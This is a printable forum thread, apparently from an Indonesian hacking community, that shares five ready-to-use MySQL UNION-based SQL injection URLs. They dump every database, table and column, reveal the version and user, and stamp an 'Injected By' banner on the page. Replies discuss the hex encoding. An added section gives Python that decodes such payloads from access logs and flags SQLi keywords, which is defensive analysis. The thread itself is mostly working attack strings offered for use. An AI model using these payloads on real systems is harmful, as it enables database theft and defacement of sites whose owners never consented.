Share Playing With SQLi Output - Printable Version
Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
Thread: Share Playing With SQLi Output (/thread-5723.html)

Playing With SQLi Output - wine trochanter - 04-12-2014

Assalamualaikum, just dropping in to share.

#PART 1 Display all tables in the database

target/v2/news.php?id=90' div 0 UniOn SeleCt 1,(select (@x) from (select (@x:=0x00), (select (0) from (information_schema.tables) where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x),3,4,5,6-- -

#PART 2 Display every database, table and column in a single command

target/v2/news.php?id=90' div 0 UniOn SeleCt 1,(SELECT(@x)from(SELECT(@x:=0x00),(SELECT(0)from(information_schema.columns)where(table_schema!=0x64617461626173652829)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2f,table_name,0x2f,column_name))))x),3,4,5,6-- -

#PART 3 Display all tables with a sequence number

target/news.php?id=90' div 0 UniOn SeleCt 1,(select (@x) from (select (@x:=0x00), (@running_number:=0),(select (0) from (information_schema.tables) where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,@running_number:=@running_number+1,0x2e20,table_name))))x),3,4,5,6-- -

#PART 4 Display the MySQL version and our name using HTML tags

target/news.php?id=90' div 0 UniOn SeleCt 1,concat('<b><font color=green size=4><center>InjeCted By wine<br><font color=blue>MySql Version :: <font color=red>',@@version),3,4,5,6-- -

#PART 5 Display the output and build a table

/news.php?id=90' div 0 UniOn SeleCt 1,concat(0x3c666f6e7420666163653d636f75726965722073697a653d333e696e6a65637465642062792077696e653e3e20,version(),0x3c7461626c6520626f726465723d313e3c74723e3c74643e557365723c2f74643e3c74643e,user(),0x3c2f74643e3c2f74723e3c74723e3c74643e44617461626173653c2f74643e3c74643e,database(),0x3c2f74643e3c2f74723e3c2f7461626c653e),3,4,5,6-- -

Okay, that's it for now, hope it's useful. See u next time, thx to G_26 and Ajkaro \m/\m/\m/

RE: Playing With SQLi Output - cyberly - 04-16-2014

(04-12-2014, 12:58 PM)wine trochanter Wrote: Assalamualaikum, just dropping in to share

If you're talking about SQLi, I just give up, teach me bro... :3

RE: Playing With SQLi Output - wine trochanter - 04-16-2014

(04-16-2014, 11:52 AM)cyberly Wrote:
(04-12-2014, 12:58 PM)wine trochanter Wrote: Assalamualaikum, just dropping in to share

Sure thing, let's learn together.

RE: Playing With SQLi Output - ./exsucks - 04-17-2014

Just following along for now, TS, since I still don't understand SQLi.

RE: Playing With SQLi Output - iKONspirasi - 04-18-2014

What does 0x3c666f6e7420666163653d636f75726965722073697a653d333e696e6a65637465642062792077696e653e3e20 mean, bro?

RE: Playing With SQLi Output - wine trochanter - 04-18-2014

(04-18-2014, 09:08 AM)iKONspirasi Wrote: What does 0x3c666f6e7420666163653d636f75726965722073697a653d333e696e6a65637465642062792077696e653e3e20 mean, bro?

It means this: <font face=courier size=3>injected by wine>> \m/\m/ converted to hex.

RE: Playing With SQLi Output - iKONspirasi - 04-18-2014

Ohh, so that's hex. Nice, thanks for explaining, bro #joss
Do you use a tool or something to convert hex back to normal text? I usually use this: http://home.paulschou.net/tools/xlate/

RE: Playing With SQLi Output - wine trochanter - 04-18-2014

(04-18-2014, 08:08 PM)iKONspirasi Wrote: Ohh, so that's hex

I just use HackBar, the thread for it is here: http://indonesianbacktrack.or.id/forum/thread-5705.html

RE: Playing With SQLi Output - wahyuardan - 04-18-2014

Wow, great URL query.

RE: Playing With SQLi Output - iKONspirasi - 04-18-2014

(04-18-2014, 08:17 PM)wine trochanter Wrote:
(04-18-2014, 08:08 PM)iKONspirasi Wrote: Ohh, so that's hex

Okay bro, thanks for the info.
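
The question asked in the thread, what the long 0x3c66... literal means, is the same one an analyst faces when a request like these turns up in a web-server access log. An added example, not part of the original thread: Python that URL-decodes a log line, decodes every MySQL 0x literal in it and lists keywords seen in the thread's requests. The log line, the function names and the keyword list are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# MySQL hex literal: "0x" followed by an even number of hex digits.
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-fA-F]{2})+)\b")

# Keywords taken from the requests in the thread; a hypothetical triage
# list for this example, not a complete signature set.
INDICATORS = ("union select", "information_schema", "@@version", "concat(")

# Constructed sample: an access-log line carrying the hex literal the
# thread discusses. The client address is from a documentation range.
SAMPLE_LOG_LINE = (
    '203.0.113.7 - - [12/Apr/2014:12:58:00 +0700] "GET /news.php?id=90%27'
    "%20div%200%20UniOn%20SeleCt%201,concat(0x3c666f6e7420666163653d636f7572"
    "6965722073697a653d333e696e6a65637465642062792077696e653e3e20,version())"
    ',3,4,5,6--%20- HTTP/1.1" 200 512'
)


def _to_text(hex_digits):
    """Decode hex digits to text; undecodable bytes become U+FFFD."""
    return bytes.fromhex(hex_digits).decode("utf-8", errors="replace")


def decode_hex_literals(text):
    """Return (literal, decoded_text) for every 0x... literal in text."""
    return [(m.group(0), _to_text(m.group(1)))
            for m in HEX_LITERAL.finditer(text)]


def triage(log_line):
    """URL-decode one log line and summarise it for an analyst."""
    decoded = unquote_plus(log_line)
    # Case and whitespace are normalised so "UniOn  SeleCt" still matches.
    lowered = re.sub(r"\s+", " ", decoded.lower())
    return {
        "indicators": [k for k in INDICATORS if k in lowered],
        "hex_literals": decode_hex_literals(decoded),
        # Same request with each literal replaced by its quoted text.
        "readable": HEX_LITERAL.sub(
            lambda m: repr(_to_text(m.group(1))), decoded),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG_LINE).items():
        print(f"{key}: {value}")
```
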